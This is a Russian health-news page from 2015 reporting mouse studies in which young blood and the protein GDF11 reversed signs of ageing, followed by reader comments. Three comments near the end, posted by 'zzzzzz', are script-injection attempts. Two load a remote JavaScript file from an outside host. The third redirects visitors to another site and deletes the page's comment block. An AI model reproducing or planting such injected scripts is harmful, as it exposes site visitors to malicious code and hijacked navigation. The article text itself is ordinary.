Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кровь молодых сделает вас...  >>  Кровь молодых сделает вас тоже молодыми!
 
Обратная связь
 

Кровь молодых сделает вас тоже молодыми!

Размер шрифта
19 января 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Совсем недавно ученым удалось доказать, что кровь молодых мышей может обратить старение у их более пожилых собратьев, «обновляя» мышечные ткани и головной мозг.  

Кровь молодых сделает вас тоже молодыми!

Ученые считают, что дальнейшие разработки в этой области помогут справиться с заболеваниями сердца и болезнью Альцгеймера, которая часто поражает пожилых людей. «Я невероятно взволнован. Эти исследования могут полностью изменить наше представление о старении», – заявляет Рудольф Танзи, профессор неврологии из Гарварда.

В последнее время ученые убедились в том, что именно стволовые клетки играют наиболее важную роль в поддержании тканей тела в здоровом состоянии. Когда ткань повреждена, стволовые клетки образуют новые клетки, которые замещают погибшие участки. Чем старше становится человек, тем хуже функционирует система стволовых клеток. Однако исследование, проведенное в 2000 году, показало, что даже в старых тканях присутствует достаточное количество стволовых клеток. «Их там очень много», – рассказывает Томас Рэндо, профессор неврологии из Стенфорда. «Они просто не получают правильных команд».

Доктор Рэндо с коллегами хотели понять, какие сигналы будут получать стволовые клетки старых тканей при соприкосновении с кровью более молодых организмов. Результаты их эксперимента показали, что в крови молодых мышей содержатся определенные вещества, которые могут «разбудить» старые стволовые клетки и тем самым привести к обновлению стареющих тканей.

Эми Ваджерс, одна из ученых группы Рэндо, продолжила эксперименты и пришла к выводу, что благодаря крови более молодых особей можно добиться эффекта «омоложения» сердца у старых мышей. Чтобы определить, какое именно вещество ответственно за такие радикальные изменения, доктор Ваджерс внимательно изучила состав крови мышей и смогла выделить белок GDF11, который в изобилии присутствовал у молодых и практически отсутствовал у старых особей. При введении пожилым особям этот белок вызывал обновление как сердечной мышцы, так и скелетных мышц, делая мышей более сильными и выносливыми. 

Ученые из медицинской школы Стенфорда провели собственное исследование, чтобы определить, может ли введение крови молодых особей привести к изменениям головного мозга старых мышей. Когда старые мыши получали порцию крови, у них начинали образовываться новые нервные клетки и межклеточные соединения в определенной области мозга – гиппокампе, который играет важную роль в формировании воспоминаний. Также они обнаружили, что если убрать из крови молодых мышей все клетки и ввести пожилым особям оставшуюся плазму крови, их память может улучшиться. Доктор Ваджерс и ее коллеги решили проверить, может ли белок GDF11, ответственный за обновление мышечной ткани и сердца, быть применен и для улучшения состояния мозга. Они выяснили, что введение мыши GDF11 также стимулирует рост сосудов и нейронов в головном мозге.

Такое обновление тканей может происходить в любом участке организма, считают ученые. «Вместо того, чтобы принимать отдельные препараты для сердца, мышц и мозга, вы сможете использовать то, что будет влиять на все эти ткани одновременно», – резюмирует доктор Ваджерс. Однако ученые должны быть очень осторожны – чрезмерная активация стволовых клеток может привести к тому, что они будут бесконтрольно увеличивать свою численность.

«Мы можем повернуть часы времени вспять, вместо того, чтобы пытаться их замедлить», – говорит доктор Торен Финкель, глава Центра молекулярной медицины. Вполне возможно, что человеческая версия белка GDF11 будет иметь тот же положительный эффект и станет эффективным оружием в борьбе со старением.

О других научных разработках в сфере молодости и красоты читайте на страницах нашего специального проекта «Женское здоровье».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

25 января 2015 в 13:40

Комментарий удален за нарушение Правил общения

2 - his shadow

25 января 2015 в 14:13

Цитировать   |   Пожаловаться

Да, и потом, вы себе представляете, что может произойти?
Это прямой путь к торговле, легальной, но, особенно, нелегальной кровью молодых людей. в особенности, младенцев. Так же, как торговля донорскими органами, и так же, как торговля стволовыми клетками.
Считаю, что эта статья неуместна и безнравственна.
Воистину- у перезрелого юного гения кризис сознания. вызванный работой в передаче ЖЗ.

3 - his shadow

26 января 2015 в 09:56

Комментарий удален за нарушение Правил общения

4 - his shadow

28 января 2015 в 09:22

Комментарий удален за нарушение Правил общения

5 - his shadow

28 января 2015 в 15:00

Цитировать   |   Пожаловаться

Ещё раз- где эти правила?
Устав или что- то?
Что я нарушаю своими постами.

Это вы, удаляя их безо всяких на то оснований нарушаете мои права, как участника форума оставить свой комментврий.
Или у вас приветствуются только хвалебные комментарии?
Тогда опять- это вы нарушаете моё право иметь свой взгляд на описываемую вашим перезревшим юным дарованием проблему.

6 - his shadow

29 января 2015 в 10:46

Цитировать   |   Пожаловаться

Прекратите резать мои посты.
Они ничего не нарушают, разве что благостную картину, которую вы пытаетесь здесь создать.
Если я что  нарушила- будьте любезны указать пункт в правилах, где указано, что нельзя приводить ссылки, ставящие под сомнение деятельность будущего ВРУ.

7 - zzzzzz

30 июня 2015 в 18:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

8 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

9 - zzzzzz

30 июня 2015 в 22:21

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как избавиться от признаков старости?   Лысые крысы спасут вас от старости!   Высокий сахар в крови приводит к старческому слабоумию   Факторы риска старческого слабоумия  
30 апреля 2013Нужны ли бабушке социальные сети? Оказывается, они улучшат ее умственные способности! 01 марта 2013Почему пожилые люди так часто становятся жертвами мошенников
 
14 января 2013Ученые изобрели лекарство для лечения старческого слабоумия 12 ноября 2012Старческие болезни больше не страшны
 

Слайдшоу

1
Вы проживете до 100 лет, если ответите «да» на эти вопросы
Что есть, чтобы не стареть?!
Косметологи не работают: как не покрыться морщинами без них?

Тесты

1
Как быстро вы стареете
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.